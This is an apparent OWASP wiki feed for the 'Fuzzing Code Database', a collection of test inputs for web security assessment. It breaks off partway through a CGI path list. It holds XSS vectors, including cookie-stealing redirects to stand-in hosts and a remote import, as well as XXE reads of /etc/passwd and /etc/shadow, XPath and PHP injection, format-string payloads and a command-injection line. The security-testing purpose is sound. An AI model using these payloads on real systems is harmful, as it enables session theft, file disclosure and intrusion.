&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81227</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81227"/>
				<updated>2010-04-12T16:33:18Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (8 April 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
/.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/index.shtml&lt;br /&gt;
/x.htw&lt;br /&gt;
/x.ida&lt;br /&gt;
/x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
